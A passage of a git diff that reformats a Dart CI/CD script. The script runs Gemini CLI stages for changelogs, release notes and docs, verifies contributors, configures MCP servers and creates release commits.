(Gemini 3 Pro Preview)'); if (!_geminiAvailable(warnOnly: true)) { - _warn( - 'Skipping explore stage (Gemini unavailable). No changelog data will be generated.', - ); + _warn('Skipping explore stage (Gemini unavailable). 
No changelog data will be generated.'); return; } @@ -451,10 +431,7 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync( - 'dart run $promptScriptPath "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -462,9 +439,7 @@ Future _runExplore(String repoRoot) async { ctx.savePrompt('explore', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)'); return; } @@ -528,11 +503,7 @@ Future _runExplore(String repoRoot) async { // the workflow artifact upload step. _info(''); _info('Validating Stage 1 artifacts...'); - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { // Check RunContext path first, then hardcoded fallback final ctxPath = '${ctx.runDir}/explore/$name'; @@ -615,10 +586,7 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync( - 'dart run $composerScript "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -626,9 +594,7 @@ Future _runCompose(String repoRoot) async { ctx.savePrompt('compose', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} 
chars)'); return; } @@ -637,11 +603,7 @@ Future _runCompose(String repoRoot) async { // Build the @ includes for file context. // Stage 1 artifacts may be at /tmp/ (CI download) or .runtime_ci/runs/explore/ (local). final includes = []; - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -689,8 +651,7 @@ Future _runCompose(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI exited with code ${result.exitCode}'); - if (composeStderr.isNotEmpty) - _warn(' stderr: ${composeStderr.split('\n').first}'); + if (composeStderr.isNotEmpty) _warn(' stderr: ${composeStderr.split('\n').first}'); } if (rawCompose.isNotEmpty) { @@ -731,9 +692,7 @@ Future _runCompose(String repoRoot) async { try { final bytes = File('$repoRoot/CHANGELOG.md').readAsBytesSync(); changelogContent = String.fromCharCodes(bytes.where((b) => b < 128)); - _info( - 'Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)', - ); + _info('Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)'); } catch (_) { changelogContent = ''; } @@ -788,8 +747,7 @@ Future _runReleaseNotes(String repoRoot) async { _warn('Skipping release notes (Gemini unavailable).'); // Create minimal fallback final newVersion = _versionOverride ?? 'unknown'; - final fallback = - '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); return; } @@ -799,10 +757,7 @@ Future _runReleaseNotes(String repoRoot) async { final newVersion = _versionOverride ?? 
_detectNextVersion(repoRoot, prevTag); // Derive bump type - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); final currentParts = currentVersion.split('.'); final newParts = newVersion.split('.'); String bumpType = 'minor'; @@ -825,23 +780,17 @@ Future _runReleaseNotes(String repoRoot) async { final releaseNotesDir = Directory('$repoRoot/$kReleaseNotesDir/v$newVersion'); releaseNotesDir.createSync(recursive: true); final verifiedContributors = _gatherVerifiedContributors(repoRoot, prevTag); - File('${releaseNotesDir.path}/contributors.json').writeAsStringSync( - const JsonEncoder.withIndent(' ').convert(verifiedContributors), - ); - _info( - 'Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}', - ); + File( + '${releaseNotesDir.path}/contributors.json', + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(verifiedContributors)); + _info('Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}'); // ── Load issue manifest for verified issue data ── List verifiedIssues = []; - for (final path in [ - '/tmp/issue_manifest.json', - '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json', - ]) { + for (final path in ['/tmp/issue_manifest.json', '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json']) { if (File(path).existsSync()) { try { - final manifest = - json.decode(File(path).readAsStringSync()) as Map; + final manifest = json.decode(File(path).readAsStringSync()) as Map; verifiedIssues = (manifest['github_issues'] as List?) ?? 
[]; } catch (_) {} break; @@ -856,10 +805,7 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync( - 'dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', - repoRoot, - ); + final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -867,9 +813,7 @@ Future _runReleaseNotes(String repoRoot) async { ctx.savePrompt('release-notes', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)'); return; } @@ -877,11 +821,7 @@ Future _runReleaseNotes(String repoRoot) async { // Build @ includes -- give Gemini all available context final includes = []; - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -923,8 +863,7 @@ Future _runReleaseNotes(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI failed for release notes: ${result.stderr}'); // Create fallback - final fallback = - '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); ctx.finalize(exitCode: result.exitCode); return; @@ -961,9 +900,7 @@ Future _runReleaseNotes(String repoRoot) async { content, verifiedContributors: verifiedContributors, verifiedIssues: verifiedIssues, - repoSlug: - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}', + repoSlug: Platform.environment['GITHUB_REPOSITORY'] ?? 
'${config.repoOwner}/${config.repoName}', repoRoot: repoRoot, ); _success('Post-processed release notes: ${content.length} chars'); @@ -983,9 +920,7 @@ Future _runReleaseNotes(String repoRoot) async { if (migrationFile.existsSync()) { _success('Migration guide: ${migrationFile.lengthSync()} bytes'); - File( - '/tmp/migration_guide.md', - ).writeAsStringSync(migrationFile.readAsStringSync()); + File('/tmp/migration_guide.md').writeAsStringSync(migrationFile.readAsStringSync()); } else if (bumpType == 'major') { _warn('Major release but no migration guide generated'); } @@ -999,18 +934,10 @@ Future _runReleaseNotes(String repoRoot) async { } // Build rich step summary - final rnContent = releaseNotesFile.existsSync() - ? releaseNotesFile.readAsStringSync() - : '(not generated)'; - final migContent = migrationFile.existsSync() - ? migrationFile.readAsStringSync() - : ''; - final linkedContent = linkedIssuesFile.existsSync() - ? linkedIssuesFile.readAsStringSync() - : ''; - final hlContent = highlightsFile.existsSync() - ? highlightsFile.readAsStringSync() - : ''; + final rnContent = releaseNotesFile.existsSync() ? releaseNotesFile.readAsStringSync() : '(not generated)'; + final migContent = migrationFile.existsSync() ? migrationFile.readAsStringSync() : ''; + final linkedContent = linkedIssuesFile.existsSync() ? linkedIssuesFile.readAsStringSync() : ''; + final hlContent = highlightsFile.existsSync() ? highlightsFile.readAsStringSync() : ''; _writeStepSummary(''' ## Stage 3: Release Notes Author Complete @@ -1044,13 +971,8 @@ ${_artifactLink()} /// 1. Only contributors who actually committed in THIS release are listed /// 2. GitHub usernames are verified (not guessed from display names) /// 3. Bots are excluded -List> _gatherVerifiedContributors( - String repoRoot, - String prevTag, -) { - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? 
- '${config.repoOwner}/${config.repoName}'; +List> _gatherVerifiedContributors(String repoRoot, String prevTag) { + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ @@ -1063,10 +985,7 @@ List> _gatherVerifiedContributors( return []; } - final lines = (gitResult.stdout as String) - .trim() - .split('\n') - .where((l) => l.isNotEmpty); + final lines = (gitResult.stdout as String).trim().split('\n').where((l) => l.isNotEmpty); final contributors = >[]; final seenLogins = {}; @@ -1077,9 +996,7 @@ List> _gatherVerifiedContributors( final email = parts[1]; // Skip bot emails - if (email.contains('[bot]') || - email.contains('noreply.github.com') && email.contains('bot')) - continue; + if (email.contains('[bot]') || email.contains('noreply.github.com') && email.contains('bot')) continue; // Step 2: Resolve SHA to verified GitHub login via commits API try { @@ -1092,9 +1009,7 @@ List> _gatherVerifiedContributors( if (ghResult.exitCode == 0) { final login = (ghResult.stdout as String).trim(); - if (login.isNotEmpty && - !login.contains('[bot]') && - !seenLogins.contains(login)) { + if (login.isNotEmpty && !login.contains('[bot]') && !seenLogins.contains(login)) { seenLogins.add(login); contributors.add({'username': login}); } @@ -1105,9 +1020,7 @@ List> _gatherVerifiedContributors( } if (contributors.isEmpty) { - _warn( - 'No contributors resolved from GitHub API, falling back to git names', - ); + _warn('No contributors resolved from GitHub API, falling back to git names'); // Fallback: use git display names without usernames final names = (gitResult.stdout as String) .trim() @@ -1115,9 +1028,7 @@ List> _gatherVerifiedContributors( .where((l) => l.isNotEmpty && !l.contains('[bot]')) .map((l) => l.split(' ').length > 1 ? 
l.split(' ')[1] : l) .toSet() - .map>( - (email) => {'username': email.split('@').first}, - ) + .map>((email) => {'username': email.split('@').first}) .toList(); return names; } @@ -1145,9 +1056,7 @@ String _postProcessReleaseNotes( contributorsSection.writeln('## Contributors'); contributorsSection.writeln(); if (verifiedContributors.isNotEmpty) { - contributorsSection.writeln( - 'Thanks to everyone who contributed to this release:', - ); + contributorsSection.writeln('Thanks to everyone who contributed to this release:'); for (final c in verifiedContributors) { final username = c['username'] ?? ''; if (username.isNotEmpty) { @@ -1188,25 +1097,16 @@ String _postProcessReleaseNotes( // ── Validate issue references throughout the document ── // Find all (#N) patterns and validate they exist - final issueRefs = RegExp( - r'\(#(\d+)\)', - ).allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); + final issueRefs = RegExp(r'\(#(\d+)\)').allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); if (issueRefs.isNotEmpty) { - final validIssues = verifiedIssues - .map((i) => i['number'] as int? ?? 0) - .toSet(); + final validIssues = verifiedIssues.map((i) => i['number'] as int? ?? 
0).toSet(); final fabricated = issueRefs.difference(validIssues); if (fabricated.isNotEmpty) { - _warn( - 'Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}', - ); + _warn('Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}'); for (final issueNum in fabricated) { // Remove the link but keep descriptive text: "[#N](url) — desc" → "desc" - result = result.replaceAll( - RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), - '', - ); + result = result.replaceAll(RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), ''); // Remove inline (#N) references result = result.replaceAll('(#$issueNum)', ''); } @@ -1216,11 +1116,7 @@ String _postProcessReleaseNotes( return result; } -String _buildFallbackReleaseNotes( - String repoRoot, - String version, - String prevTag, -) { +String _buildFallbackReleaseNotes(String repoRoot, String version, String prevTag) { final buf = StringBuffer(); buf.writeln('# ${config.repoName} v$version'); buf.writeln(); @@ -1296,9 +1192,7 @@ Future _runAutodoc(String repoRoot, List args) async { if (File(configPath).existsSync()) { _success('autodoc.json exists at $configPath'); } else { - _error( - 'autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json', - ); + _error('autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json'); } return; } @@ -1346,9 +1240,7 @@ Future _runAutodoc(String repoRoot, List args) async { final generateTypes = (module['generate'] as List).cast(); final libDir = libPaths.isNotEmpty ? '$repoRoot/${libPaths.first}' : ''; - _info( - ' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}', - ); + _info(' $id ($name): ${force ? 
"forced" : "changed"} -> generating ${generateTypes.join(", ")}'); if (dryRun) { updatedModules.add(id); @@ -1390,9 +1282,7 @@ Future _runAutodoc(String repoRoot, List args) async { if (dryRun) { _info(''); - _info( - '[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged', - ); + _info('[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged'); for (final id in updatedModules) { _info(' - $id'); } @@ -1406,9 +1296,7 @@ Future _runAutodoc(String repoRoot, List args) async { // Execute in parallel batches _info(''); - _info( - 'Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...', - ); + _info('Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...'); // Simple batching: process maxConcurrent at a time for (var i = 0; i < tasks.length; i += maxConcurrent) { @@ -1417,13 +1305,9 @@ Future _runAutodoc(String repoRoot, List args) async { } // Save updated config with new hashes - File( - configPath, - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); + File(configPath).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); - _success( - 'Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.', - ); + _success('Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.'); _info('Updated hashes saved to $kRuntimeCiDir/autodoc.json'); _writeStepSummary(''' @@ -1472,13 +1356,9 @@ Future _generateAutodocFile({ // Generate prompt from template final promptArgs = [moduleName, sourceDir]; if (libDir.isNotEmpty) promptArgs.add(libDir); - if (docType == 'migration' && previousHash.isNotEmpty) - promptArgs.add(previousHash); + if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); - final prompt = _runSync( - 'dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', - repoRoot, - ); + 
final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1519,10 +1399,7 @@ Do not skip any -- completeness is more important than brevity. final pass1Result = Process.runSync( 'sh', - [ - '-c', - 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', - ], + ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1530,9 +1407,7 @@ Do not skip any -- completeness is more important than brevity. if (pass1Prompt.existsSync()) pass1Prompt.deleteSync(); if (pass1Result.exitCode != 0) { - _warn( - ' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}', - ); + _warn(' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}'); return; } @@ -1613,10 +1488,7 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - [ - '-c', - 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', - ], + ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1624,9 +1496,7 @@ Write the corrected file to the same path: $absOutputFile if (pass2Prompt.existsSync()) pass2Prompt.deleteSync(); if (pass2Result.exitCode != 0) { - _warn( - ' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}', - ); + _warn(' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}'); } // Verify final output @@ -1634,9 +1504,7 @@ Write the corrected file to the same path: $absOutputFile final finalSize = outputFile.lengthSync(); final delta = finalSize - pass1Size; final deltaStr = delta >= 0 ? 
'+$delta' : '$delta'; - _success( - ' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)', - ); + _success(' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)'); return; } @@ -1682,9 +1550,7 @@ Future _runTriageCli(String repoRoot, List triageArgs) async { if (_dryRun) forwardedArgs.add('--dry-run'); if (_verbose) forwardedArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -1731,27 +1597,20 @@ Future _runVersion(String repoRoot) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); _info('Current version (pubspec.yaml): $currentVersion'); _info('Previous tag: $prevTag'); _info('Next version: $newVersion'); // Save version bump rationale if Gemini produced one - final rationaleFile = File( - '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', - ); + final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); if (rationaleFile.existsSync()) { final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; rationaleFile.copySync(targetPath); - _success( - 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } } @@ -1764,8 +1623,7 @@ Future _runConfigureMcp(String repoRoot) async { Map settings; try { - settings = - json.decode(settingsFile.readAsStringSync()) as Map; + settings = 
json.decode(settingsFile.readAsStringSync()) as Map; } catch (e) { _error('Could not read .gemini/settings.json: $e'); exit(1); @@ -1776,22 +1634,13 @@ Future _runConfigureMcp(String repoRoot) async { // GitHub MCP Server final ghToken = - Platform.environment['GH_TOKEN'] ?? - Platform.environment['GITHUB_TOKEN'] ?? - Platform.environment['GITHUB_PAT']; + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN'] ?? Platform.environment['GITHUB_PAT']; if (ghToken != null && ghToken.isNotEmpty) { _info('Configuring GitHub MCP server...'); mcpServers['github'] = { 'command': 'docker', - 'args': [ - 'run', - '-i', - '--rm', - '-e', - 'GITHUB_PERSONAL_ACCESS_TOKEN', - 'ghcr.io/github/github-mcp-server', - ], + 'args': ['run', '-i', '--rm', '-e', 'GITHUB_PERSONAL_ACCESS_TOKEN', 'ghcr.io/github/github-mcp-server'], 'env': {'GITHUB_PERSONAL_ACCESS_TOKEN': ghToken}, 'includeTools': [ 'get_issue', @@ -1822,18 +1671,14 @@ Future _runConfigureMcp(String repoRoot) async { }; _success('GitHub MCP server configured'); } else { - _warn( - 'No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.', - ); + _warn('No GitHub token found. 
Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.'); _info(' export GH_TOKEN='); } // Sentry MCP Server (remote, no local install needed) _info('Configuring Sentry MCP server (remote)...'); mcpServers['sentry'] = {'url': 'https://mcp.sentry.dev/mcp'}; - _success( - 'Sentry MCP server configured (uses OAuth -- browser auth on first use)', - ); + _success('Sentry MCP server configured (uses OAuth -- browser auth on first use)'); // Write updated settings settings['mcpServers'] = mcpServers; @@ -1844,9 +1689,7 @@ Future _runConfigureMcp(String repoRoot) async { return; } - settingsFile.writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(settings)}\n', - ); + settingsFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(settings)}\n'); _success('Updated .gemini/settings.json with MCP servers'); _info(''); @@ -1875,10 +1718,7 @@ Future _runStatus(String repoRoot) async { _info('Required tools:'); for (final tool in [...kRequiredTools, ...kOptionalTools]) { if (_commandExists(tool)) { - final version = _runSync( - '$tool --version 2>/dev/null || echo "installed"', - repoRoot, - ); + final version = _runSync('$tool --version 2>/dev/null || echo "installed"', repoRoot); _success(' $tool: $version'); } else { _error(' $tool: NOT INSTALLED'); @@ -1889,29 +1729,22 @@ Future _runStatus(String repoRoot) async { _info(''); _info('Environment:'); final geminiKey = Platform.environment['GEMINI_API_KEY']; - _info( - ' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}', - ); - final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + _info(' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}'); + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; _info(' GitHub token: ${ghToken != null ? 
"set" : "NOT SET"}'); // Check MCP servers _info(''); _info('MCP servers:'); try { - final settings = json.decode( - File('$repoRoot/.gemini/settings.json').readAsStringSync(), - ); + final settings = json.decode(File('$repoRoot/.gemini/settings.json').readAsStringSync()); final mcpServers = settings['mcpServers'] as Map?; if (mcpServers != null && mcpServers.isNotEmpty) { for (final server in mcpServers.keys) { _success(' $server: configured'); } } else { - _info( - ' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp', - ); + _info(' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp'); } } catch (_) { _info(' Could not read MCP configuration'); @@ -1931,10 +1764,7 @@ Future _runStatus(String repoRoot) async { // Show version info _info(''); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); final prevTag = _detectPrevTag(repoRoot); _info('Package version: $currentVersion'); _info('Latest tag: $prevTag'); @@ -1955,20 +1785,14 @@ Future _runDetermineVersion(String repoRoot, List args) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); // Determine if we should release var shouldRelease = newVersion != currentVersion; // Safety net: if the tag already exists, skip release regardless if (shouldRelease) { - final tagCheck = Process.runSync('git', [ - 'rev-parse', - 'v$newVersion', - ], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', ['rev-parse', 'v$newVersion'], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _warn('Tag v$newVersion already exists. 
Skipping release.'); shouldRelease = false; @@ -1982,28 +1806,18 @@ Future _runDetermineVersion(String repoRoot, List args) async { // Save version bump rationale if Gemini produced one if (shouldRelease) { - final rationaleFile = File( - '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', - ); + final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; if (rationaleFile.existsSync()) { rationaleFile.copySync(targetPath); - _success( - 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } else { // Generate basic rationale - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); - final commits = _runSync( - 'git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', - repoRoot, - ); + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -2011,9 +1825,7 @@ Future _runDetermineVersion(String repoRoot, List args) async { '**Commits**: $commitCount\n\n' '## Commits\n\n$commits\n', ); - _success( - 'Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md', - ); + _success('Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md'); } } @@ -2056,9 +1868,7 @@ Future _runDetermineVersion(String repoRoot, List args) async { } // Read version bump rationale for summary - final rationaleContent = _readFileOr( - '$repoRoot/$kVersionBumpsDir/v$newVersion.md', - ); + final rationaleContent = 
_readFileOr('$repoRoot/$kVersionBumpsDir/v$newVersion.md'); _writeStepSummary(''' ## Version Determination @@ -2117,10 +1927,7 @@ Future _runCreateRelease(String repoRoot, List args) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); final pubspecContent = pubspecFile.readAsStringSync(); pubspecFile.writeAsStringSync( - pubspecContent.replaceFirst( - RegExp(r'^version: .*', multiLine: true), - 'version: $newVersion', - ), + pubspecContent.replaceFirst(RegExp(r'^version: .*', multiLine: true), 'version: $newVersion'), ); _info('Bumped pubspec.yaml to version $newVersion'); @@ -2147,14 +1954,13 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - if (foundReleaseNotes != null && - foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { + if (foundReleaseNotes != null && foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { foundReleaseNotes.copySync('${releaseDir.path}/release_notes.md'); _info('Copied release notes to ${releaseDir.path}/release_notes.md'); } else if (foundReleaseNotes == null) { - File('${releaseDir.path}/release_notes.md').writeAsStringSync( - _buildFallbackReleaseNotes(repoRoot, newVersion, prevTag), - ); + File( + '${releaseDir.path}/release_notes.md', + ).writeAsStringSync(_buildFallbackReleaseNotes(repoRoot, newVersion, prevTag)); _warn('No Stage 3 release notes found -- generated fallback'); } @@ -2178,9 +1984,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Copy Stage 3 linked issues if it exists, otherwise create minimal final existingLinked = File('${releaseDir.path}/linked_issues.json'); if (!existingLinked.existsSync()) { - File('${releaseDir.path}/linked_issues.json').writeAsStringSync( - '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}', - ); + File( + '${releaseDir.path}/linked_issues.json', + ).writeAsStringSync('{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}'); } // Copy Stage 3 highlights if 
it exists @@ -2193,10 +1999,7 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelog = File('$repoRoot/CHANGELOG.md'); if (changelog.existsSync()) { final content = changelog.readAsStringSync(); - final entryMatch = RegExp( - '## \\[$newVersion\\].*?(?=## \\[|\\Z)', - dotAll: true, - ).firstMatch(content); + final entryMatch = RegExp('## \\[$newVersion\\].*?(?=## \\[|\\Z)', dotAll: true).firstMatch(content); File( '${releaseDir.path}/changelog_entry.md', ).writeAsStringSync(entryMatch?.group(0)?.trim() ?? '## [$newVersion]\n'); @@ -2204,9 +2007,7 @@ Future _runCreateRelease(String repoRoot, List args) async { // Contributors: use the single verified source of truth final contribs = _gatherVerifiedContributors(repoRoot, prevTag); - File( - '${releaseDir.path}/contributors.json', - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); + File('${releaseDir.path}/contributors.json').writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); _success('Release notes assembled in $kReleaseNotesDir/v$newVersion/'); @@ -2218,11 +2019,7 @@ Future _runCreateRelease(String repoRoot, List args) async { // Step 4: Commit all changes _info('Configuring git identity for release commit'); _exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot); - _exec('git', [ - 'config', - 'user.email', - 'github-actions[bot]@users.noreply.github.com', - ], cwd: repoRoot); + _exec('git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot); // Add files individually — git add is all-or-nothing and will fail the // entire command if any path doesn't exist (e.g., autodoc.json on first @@ -2237,8 +2034,7 @@ Future _runCreateRelease(String repoRoot, List args) async { '$kRuntimeCiDir/autodoc.json', ]; if (Directory('$repoRoot/docs').existsSync()) filesToAdd.add('docs/'); - if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) - filesToAdd.add('$kCicdAuditDir/'); + if 
